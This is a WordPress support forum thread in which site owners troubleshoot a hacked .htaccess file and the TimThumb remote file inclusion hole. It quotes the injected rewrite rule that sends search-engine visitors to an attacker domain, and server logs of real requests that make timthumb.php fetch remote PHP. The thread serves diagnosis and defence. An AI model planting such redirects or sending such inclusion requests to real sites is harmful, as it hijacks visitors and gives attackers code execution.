Wp .htaccess is hacked for the 2nd time

(@hema-latha)

Hello,

I’m using the latest version of wp. ie., v3.2.1
Site hosted in Godaddy hosting.

Previously my wp .htaccess was modified by someone,
I removed the code and now again it’s modified with the same code.
This code redirects my search engine traffic to some other website.

I have mentioned about this previously here:
http://www.wpsecuritylock.com/wordpress-3-2-gershwin-is-released/comment-page-1/#comment-4687
I really don’t know how it’s been done.

Please advise me how to prevent this from happening again.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http : // sokoloperkovuskeci . com / in . php ? g = 56 [R,L]
</IfModule>

Viewing 15 replies - 31 through 45 (of 49 total)

← 1 2 3 4 →

MickeyRoush
(@mickeyroush)

12 years, 8 months ago

This tricks the tinythumb.php script into downloading the file from dpprc.com. It is disguised as a PNG, (with a binary PNG header), but has the following code in it:

If a picture is opened in an image editor, like Gimp, one can edit the image comment, where PHP code is inserted.

The image will still have a valid header; therefore it bypasses the getimagesize PHP check. PHP code inserted in the image comments still gets executed when the image is requested from a normal web browser.

http://www.acunetix.com/websitesecurity/upload-forms-threat.htm

rocr69
(@rocr69)

12 years, 7 months ago

Just got a warning via Firefox from stopbadware.com that searches were being redirected to sokoloperkovuskeci.com.

I’ve never used timthumb and it isn’t installed.

I’ve been running BulletProof for months and Securi says I’m not infected, blacklisted, etc.

Is this a false positive or am I missing something?

jaybook
(@jaybook)

12 years, 7 months ago

Hi roc69,

please check your htaccess file for code that redirects Google and other search engines to sokoloperkovuskeci.com

Did you check your theme and plugin folders for timthumb.php or thumb.php?
If it wasn’t that, perhaps the attacker exploited another hole in WordPress to modify your htaccess file.

rocr69
(@rocr69)

12 years, 7 months ago

I’ve put the site in maintenance mode while trying to figure this out. I don’t have thumb or timthumb installed.

Here’s what’s in HTA.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

I think that looks OK.

However, wp-config has some apparently funky code:

define(‘AUTH_KEY’, ‘XRQ;,/[DX-^y~176ih)OO5TVYoG0J(ve)8FiT/w,UT>2V*,o,;r$ja;Di+^1CCHO’);
define(‘SECURE_AUTH_KEY’, ‘E!I{IyGv}j) 7,:}8pO9iMo1|_@{S-]lZ)2<O2G9~!F/JDlF8{awHm0obm =J?ne’);
define(‘LOGGED_IN_KEY’, ‘E&+w|9uB52zr3=P-59-n~-~8+(s-ci)@y*>Nuc3UB%q,>Rd7%pTxQ|%<aeCP@nvI’);
define(‘NONCE_KEY’, ‘5*3Q.,06CcpWFZ{AFz#/ pBz0?O@C2@pJ |~U-h5JLmn =3e5/.p_n+JpV[|b>=D’);
/**#@-*/

What to do next?

esmi
(@esmi)

12 years, 7 months ago

Those keys are supposed to look like that.

rocr69
(@rocr69)

12 years, 7 months ago

Great. What strange voodoo has been worked upon my site then?

esmi
(@esmi)

12 years, 7 months ago

http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

rocr69
(@rocr69)

12 years, 7 months ago

Here’s a twist. By the time I looked at the HTA and wp-config files, Go Daddy had already been in there and set things right — that’s why they were normal.

The rep I spoke to today wasn’t aware that his technical people were aware of the problem and had already “fixed” it. Or, if he was, didn’t let on when he said the problem was actually with Google (!@#$!@#$)!

Got an email from them this evening saying a problem had been detected and fixed “earlier this week.”

Anyway, changed passwords, will reinstall much per the above and back to slugging it out for page views and CPM. Here’s hoping this is the end of “sokoloperkovuskeci.com”…

Thank you, esmi.

samratkafle1
(@samratkafle1)

12 years, 6 months ago

In your htaccess file, put in this line:

<Files wp-config.php>
order allow,deny
deny from all
</Files>
or link to this full article about protecting wordpress may help you.

AITpro
(@aitpro)

12 years, 6 months ago

FilesMatch is a better method than Files. This .htaccess code is already in BulletProof Security if you want to grab it from there. Also some other critical files are protected as well.

<FilesMatch “^(wp-config\.php|install\.php|\.htaccess|php\.ini|php5\.ini|readme\.html|bb-config\.php)”>
Deny from all
# Allow from 88.55.66.200
</FilesMatch>

Thanks.

spidersilk
(@spidersilk)

12 years, 4 months ago

A WP site I maintain has just been hit with the .htaccess hack, and I’m having trouble getting rid of it.

I haven’t been able to find any of those thumbnailer scripts, either in any of my plugins or in my active theme. It might be somewhere in an inactive theme, though, if that could work – still checking through those.

What I have done is replaced the bad .htaccess file with a new vanilla one, checked to make sure there were no other files anywhere on the site with recent dates (there weren’t, except for some photos in the uploads folder, but I checked all of those and they were actual photos that were in a blog post), changed all passwords, re-uploaded all WP core files, and installed Bulletproof Security.

But I’m still having problems. Everything seemed briefly OK when I first replaced the .htacess file, but then halfway through configuring BPS, suddenly all the links in the admin started redirecting to the attack site again (http://shugarmail.in/inox/).

So I checked the .htaccess file again to see if had already been replaced again – but it hadn’t been! The .htaccess file looks fine now, but links are still redirecting to the attack site, and I’m not sure how this is happening. The problem seemed to come back when I installed BPS for some reason.

Right now, I can manually get to pages like BPS’s settings if I copy and paste the link into the browser’s address bar instead of clicking on it – if I click on any link, it sends me to the attack site. But I can’t actually save any changes from any page in the admin – that just sends me to the attack site as well.

I can’t figure out how it could still be redirecting links when the .htaccess file is now back to its original state (i.e. nothing in it but the BEGIN WordPress / END WordPress lines), and no other files appear to have been modified. I didn’t spot any other .htaccess files elsewhere in the site when I was going through it… Is there some other way this could be happening?

spidersilk
(@spidersilk)

12 years, 4 months ago

OK, I’ve tried a few more times manually replacing my .htaccess file with a new one, and even tried copying out the text shown on the BPS settings page for the secure .htaccess file and pasting it into my .htaccess file manually.

But the same thing happens each time: it works very briefly, so that the first load of any admin page shows up properly (with its CSS styling intact, which is not the case when the link redirection is happening), but then as soon as I click on a link, submit a form or load any other page, even in a separate tab, the link redirection is back.

And then when I go to check the .htaccess page again, it has always been restored to its plain BEGIN WordPress / END WordPress state. Except when I used the secure .htaccess code, and then it still showed the commented lines in that, but had stripped out all the active lines for some reason. So something appears to be stripping out all code from the .htacess file for some reason.

But the weird thing is, it’s NOT replacing it with the redirect code it originally had – that no longer seems to be present anywhere, but it must be, because the links are still redirecting.

I’m totally confused. And it probably doesn’t help that it’s now 4:30 am and I’ve been working on this for 2.5 hours. I’m going to try and get some sleep and hope maybe someone who knows more about this than I do will have answered by tomorrow…

AITpro
(@aitpro)

12 years, 4 months ago

Ok well i hate to tell you this, but if your site has already been hacked then you need to restore it from a good backup before it was hacked. You can try and de-hack your site, but this is a very time consuming thing to do. it is much simpler and quicker to just restore your site from a known good backup. Also hopefully you also have a good backup of your database so that you can restore that as well.

BPS is designed to keep your site from being hacked, but if your site is already hacked then BPS does not de-hack it automatically. BPS is like a bank vault door. If the hackers have already previously gotten past the vault door than the door is no longer protecting the vault.

Hackers Shell scripts like c99, r57 and AluCar give the hackers unlimited access to do anything they want with your website – create files, edit files, upload files, rename files, create database tables, edit database tables, delete database tables and much more. Shell scripts have their own Admin login panel similar to the WP Dashboard and include all kinds of additional options to allow hackers to do whatever they want with your website.

spidersilk
(@spidersilk)

12 years, 4 months ago

Thanks for your response.

I can restore the database easily, and the plugins, themes, etc., and I’ve already restores the core WP files from a freshly downloaded copy. But I don’t think there is any recent backup of the uploads folder. 🙁

The confusing thing is, there didn’t appear to be any other files in there with recent modification dates, other than the .htaccess file, and a small handful of photos, which I checked out and they were all actual photos from a recent blog post. So I can’t figure out where they could have uploaded any sort of shell script… Is there some way it could not be visible via FTP?

I did find eventually that there were two copies of thumb.php in two themes I wasn’t using – can this exploit work with a non-active theme file? I’m now in the process of deleting every theme other than the two core ones and the one the site actually uses (which does not use any thumbnailer script).

AITpro
(@aitpro)

12 years, 4 months ago

Typically you will find the initial Shell script file in a /cache or /temp folder. From there once a hacker has got his Shell script uploaded to your site they will then proceed to install typically anywhere from 1 to 100 backdoors and whatever else they want to install in your files or your DB.

Yes if you have a Theme that is not active the timthumb exploit still works. This is what some common timthumb RFI hacking attempt looks like.

This hacking attempt is spoofing the Google Bot User Agent too 😉
>>>>>>>>>>> 404 Error Logged [12/03/2011 2:00 PM] <<<<<<<<<<<
REMOTE_ADDR: 208.100.58.37
Host Name: vps10.netwisp.net
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /aitpro-blog/wp-content/themes/primely-theme/scripts/temp/14f6402efe2220002abf444d3cb3e4d0.php
QUERY_STRING:
HTTP_USER_AGENT: Googlebot/2.1 (+http://www.google.com/bot.html)

>>>>>>>>>>> 403 Error Logged [12/03/2011 2:00 PM] <<<<<<<<<<<
REMOTE_ADDR: 208.100.58.37
Host Name: vps10.netwisp.net
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /aitpro-blog//wp-content/themes/primely-theme/scripts/timthumb.php?src=http://www.myphotofolio.co.uk/myid.php
QUERY_STRING:
HTTP_USER_AGENT: Googlebot/2.1 (+http://www.google.com/bot.html)

>>>>>>>>>>> 403 Error Logged [11/25/2011 7:40 AM] <<<<<<<<<<<
REMOTE_ADDR: 178.63.59.195
Host Name: ns4.uniwebhosting.com
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /aitpro-blog/tag/bps-testing-to-do-list//wp-content/plugins/dukapress/lib/thumb.php?src=http://picasa.com.erospc.com/no2.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0